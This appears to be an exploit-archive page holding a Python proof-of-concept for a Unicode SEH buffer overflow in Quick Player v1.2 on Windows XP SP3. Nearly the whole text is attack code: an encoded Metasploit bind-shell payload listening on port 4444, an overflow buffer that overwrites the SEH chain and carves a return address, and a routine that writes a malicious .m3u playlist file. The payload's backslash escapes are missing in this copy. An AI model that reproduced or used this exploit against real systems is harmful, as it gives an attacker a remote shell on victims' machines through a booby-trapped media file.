Quick Player v1.2 Unicode BOF

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Quick Player v1.2 Unicode BOF - bindshell
# Published : 2010-01-06
# Author : sinn3r
# Previous Title : DirectAdmin <= 1.33.6 Symlink Permission Bypass
# Next Title : PlayMeNow Malformed M3U Playlist BOF WinXP SP2 Fr
#!/usr/bin/python

## Quick Player v1.2 Unicode Buffer Overflow
## Found by  :  mr_me  (great job by mr_me!)  http://www.exploit-db.com/exploits/10797
## Coded by  :  sinn3r  (x90.sinner{at}gmail{d0t]c0m)
## thanks    :  corelanc0d3r's unicode article - awesome job!
## Tested on :  Windows XP SP3 ENG
## Oops! Here goes one of my n00b moments...

# windows/shell_bind_tcp lport=4444 http://metasploit.com
bindshell = ("x50x50x59x41x49x41x49x41x49x41x49x41x51x41x54"
"x41x58x41x5ax41x50x55x33x51x41x44x41x5ax41x42"
"x41x52x41x4cx41x59x41x49x41x51x41x49x41x51x41"
"x50x41x35x41x41x41x50x41x5ax31x41x49x31x41x49"
"x41x49x41x4ax31x31x41x49x41x49x41x58x41x35x38"
"x41x41x50x41x5ax41x42x41x42x51x49x31x41x49x51"
"x49x41x49x51x49x31x31x31x31x41x49x41x4ax51x49"
"x31x41x59x41x5ax42x41x42x41x42x41x42x41x42x33"
"x30x41x50x42x39x34x34x4ax42x45x39x49x51x49x4a"
"x49x49x48x59x44x31x4ax54x51x4dx42x35x42x39x50"
"x49x50x49x51x39x51x39x50x49x51x39x50x49x51x39"
"x51x39x51x39x51x33x50x43x50x43x50x43x50x43x50"
"x43x50x37x42x31x50x5ax42x4ax51x31x50x58x50x50"
"x50x30x51x31x50x30x51x31x42x4bx51x31x51x31x42"
"x31x50x32x51x31x51x32x50x32x51x32x51x32x50x30"
"x50x42x51x32x51x31x51x32x50x58x42x30x50x38x51"
"x31x51x32x42x55x50x4ax51x39x50x49x42x4cx50x4d"
"x50x38x50x4fx44x39x50x43x50x30x50x47x42x50x50"
"x45x50x50x51x35x50x30x50x4bx50x39x50x4ax50x45"
"x50x45x43x31x50x4ex50x32x50x43x42x34x50x4cx50"
"x4bx50x50x51x42x50x46x50x50x50x4ex42x4bx42x31"
"x50x42x50x44x50x4cx50x4cx50x4bx51x36x50x32x51"
"x37x43x34x50x4ex42x4bx50x51x43x32x50x47x42x38"
"x50x44x50x4fx50x4cx42x57x51x32x51x5ax51x35x43"
"x46x51x36x50x51x50x49x42x4fx50x46x42x31x50x4b"
"x42x50x50x4cx42x4cx50x45x42x4cx50x50x43x31x50"
"x51x42x4cx51x35x42x32x50x46x50x4cx51x35x42x50"
"x50x4ax43x31x50x4ax42x4fx51x34x50x4dx51x37x42"
"x51x50x4bx42x57x51x39x44x32x50x4cx50x30x50x46"
"x50x32x50x43x43x37x50x4ex42x4bx50x43x42x42x51"
"x34x50x50x50x4cx50x4bx50x50x50x42x50x47x50x4c"
"x50x46x51x51x50x4ex50x30x50x4ex42x4bx50x47x50"
"x30x50x42x51x48x50x4fx42x55x50x4bx42x50x51x34"
"x50x34x50x43x43x4ax51x37x44x31x50x48x50x50x51"
"x32x44x30x50x4cx50x4bx50x42x42x48x50x42x50x38"
"x50x4cx50x4bx42x31x51x38x51x37x42x30x51x37x42"
"x51x50x4ex50x33x50x4dx50x33x50x45x42x4cx51x32"
"x43x39x50x4ex42x4bx51x35x43x34x50x4cx50x4bx51"
"x37x42x51x50x49x51x36x42x30x50x31x51x39x42x4f"
"x50x44x42x51x50x4fx50x30x50x4cx42x4cx50x4bx42"
"x51x50x4ax42x4fx51x36x42x4dx50x43x50x31x50x4a"
"x42x47x51x35x43x38x50x4bx42x30x50x51x42x45x50"
"x48x43x44x51x33x50x33x50x43x50x4dx50x4ax42x38"
"x51x35x42x4bx50x43x50x4dx50x45x44x34x50x43x51"
"x35x50x48x51x52x51x32x42x58x50x4cx50x4bx50x42"
"x44x38x50x47x51x44x51x37x44x31x50x4bx43x33x50"
"x50x43x36x50x4ex42x4bx50x44x50x4cx50x42x42x4b"
"x50x4cx50x4bx51x33x42x48x51x35x50x4cx50x45x42"
"x31x51x38x50x53x50x4ex42x4bx51x36x51x54x50x4e"
"x42x4bx51x37x44x31x51x38x42x30x50x4dx42x39x50"
"x51x42x34x50x45x42x54x51x34x42x44x51x33x42x4b"
"x50x43x42x4bx51x35x50x31x51x32x44x39x51x33x51"
"x5ax50x50x50x51x50x4bx50x4fx50x4bx50x50x50x42"
"x43x48x51x33x42x4fx42x31x50x4ax50x4ex42x4bx50"
"x46x42x52x50x4ax50x4bx50x4fx42x56x50x51x50x4d"
"x51x35x50x38x50x50x50x33x51x36x51x42x50x43x50"
"x30x50x47x42x50x51x35x50x38x51x34x50x37x42x30"
"x43x43x50x44x42x52x51x33x42x4fx50x42x43x44x50"
"x51x42x58x42x30x50x4cx50x42x42x37x51x35x44x36"
"x50x47x42x57x50x4bx50x4fx50x4ex50x35x50x4fx50"
"x48x50x4cx50x50x50x45x50x51x50x47x44x30x50x45"
"x42x30x50x46x51x39x50x4fx50x34x50x46x50x34x51"
"x32x44x30x51x35x50x38x42x31x50x39x50x4bx50x30"
"x42x30x42x4bx51x33x50x30x50x4bx50x4fx50x49x51"
"x35x50x50x42x30x50x46x50x30x42x30x42x30x51x36"
"x50x30x50x51x42x30x51x36x50x30x42x31x42x30x50"
"x42x42x50x51x35x50x38x51x38x42x4ax50x46x42x4f"
"x50x49x50x4fx51x39x42x50x50x4bx50x4fx50x48x42"
"x35x50x4dx42x39x50x4bx44x37x51x36x42x31x50x4b"
"x42x4bx51x32x42x53x50x50x51x58x50x45x51x42x51"
"x35x42x30x51x36x42x51x50x43x42x4cx50x4fx42x59"
"x50x4ax51x36x50x50x51x5ax51x36x42x50x51x36x50"
"x36x51x32x43x47x50x51x42x58x51x39x50x52x51x39"
"x50x4bx51x37x51x37x50x50x42x47x51x39x42x4fx50"
"x4ex50x35x50x46x50x33x50x42x44x37x42x31x42x58"
"x50x4ex42x37x50x48x51x59x51x36x51x48x50x4bx50"
"x4fx50x4bx50x4fx50x48x50x55x50x43x51x53x51x33"
"x42x43x51x33x51x57x50x50x42x48x42x30x42x54x51"
"x38x42x4cx51x35x42x4bx50x4dx50x31x50x49x42x4f"
"x50x4bx42x45x51x33x43x37x50x4fx43x49x50x49x51"
"x47x50x42x50x48x42x31x51x55x51x32x50x4ex51x32"
"x42x4dx51x33x42x31x50x4bx50x4fx50x48x51x45x50"
"x42x51x38x50x43x42x33x51x32x50x4dx42x30x43x34"
"x51x37x42x50x50x4dx51x49x51x38x51x53x50x51x50"
"x47x42x31x51x37x51x36x50x37x50x44x44x31x50x4c"
"x50x36x50x51x42x5ax50x42x50x32x42x31x51x39x50"
"x46x50x36x50x4dx50x32x51x39x42x4dx42x30x51x56"
"x50x4ax42x47x50x47x50x34x50x45x44x34x51x35x42"
"x4cx50x46x43x31x50x46x51x51x50x4ex42x4dx50x50"
"x51x34x42x31x50x34x50x42x50x30x50x48x50x46x50"
"x47x42x50x50x47x50x34x50x51x51x34x50x50x50x50"
"x50x50x51x46x50x43x43x36x51x36x50x36x42x30x50"
"x46x51x33x51x56x42x30x50x4ex50x46x50x36x51x33"
"x51x56x50x42x44x33x50x50x50x56x51x32x50x48x50"
"x51x51x59x50x4ax42x4cx50x47x50x4fx50x4cx50x46"
"x50x4bx50x4fx51x38x51x45x50x4ex42x49x50x4dx50"
"x30x42x30x50x4ex50x50x50x56x50x43x43x46x50x4b"
"x50x4fx50x50x50x30x50x45x50x38x50x46x51x58x50"
"x4ex51x57x51x35x50x4dx51x35x50x30x50x4bx50x4f"
"x50x4bx43x35x50x4dx42x4bx50x4ax42x30x50x4fx50"
"x45x50x4cx43x32x42x31x50x46x50x42x50x48x50x4d"
"x43x46x50x4dx50x45x50x4fx50x4dx50x4fx42x4dx50"
"x4bx50x4fx51x38x50x55x50x47x50x4cx51x33x50x36"
"x50x51x42x4cx51x36x51x5ax50x4dx50x50x50x4bx50"
"x4bx50x4dx50x30x50x44x50x35x50x46x43x35x50x4f"
"x50x4bx50x42x42x47x50x46x43x43x42x30x43x42x50"
"x42x50x4fx50x43x50x5ax51x37x44x30x50x42x42x53"
"x50x49x42x4fx50x4bx51x55x50x45x51x4ax51x31x51"
"x31x41x41")

buffer = (
"x41"*536 +	# junk
####################################################################
# SEH Chain:
"x41x6D"	# Pointer to Next SEH record (unicode = 0x6D004100)
"x41x4D"	# SE Handler (unicode format = 0x004A0059)
####################################################################
# START CARVING THE RET ADDRESS:
# 0x0012e270 (first item on the stack) + 0x11006100 - 0x11006000 = 0x0012E370 (RET)
"x58"		# POP EAX
"x6D"		# Separator
"x05x61x11"	# ADD EAX, 0x11006100 (chars expanded due to unicode)
"x6D"		# Separator
"x2Dx60x11"	# SUB EAX, 0x11006000 (chars expanded due to unicode)
"x6D"		# Separator
"x50"		# PUSH EAX
"x6D"		# Separator
"xC3"+		# RETN	; (0x0012E370)
#####################################################################
# bindshell lport 4444
"x41"*111+	# Alignment
bindshell+	# bindshell lport 4444
"x44"*3000)	# some mo' padding to please my eyes

f = open("quick_player_exploit.m3u", "w")
f.write(buffer)
f.close()

print "[*] quick_player_exploit.m3u created! ph33r!"